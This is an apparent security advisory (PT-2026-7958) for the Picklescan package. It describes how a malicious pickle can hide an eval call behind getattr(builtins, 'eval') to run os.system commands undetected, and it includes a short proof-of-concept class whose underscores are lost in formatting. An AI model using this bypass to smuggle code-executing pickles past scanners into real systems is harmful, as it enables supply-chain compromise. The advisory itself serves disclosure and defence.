PT-2026-7958 · Pypi · Picklescan
Published
2026-02-02
·
Updated
2026-02-02
CVSS v4.0
8.9
High
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P |
Summary
An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source.
Details
It's possible to hide the
eval call nested under another callable via getattr.PoC
python
import builtins
class EvilClass:
@staticmethod
def obfuscated eval(payload):
getattr(builtins, "eval")(payload)
def reduce (self):
payload = " import ('os').system('echo "successful attack"')"
return self. obfuscated eval, (payload,)Impact
Who is impacted?
Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources.
What is the impact?
Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files to system that load serialized ML models, APIs, or saved Python objects from untrusted sources.
Fix
Deserialization of Untrusted Data
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Picklescan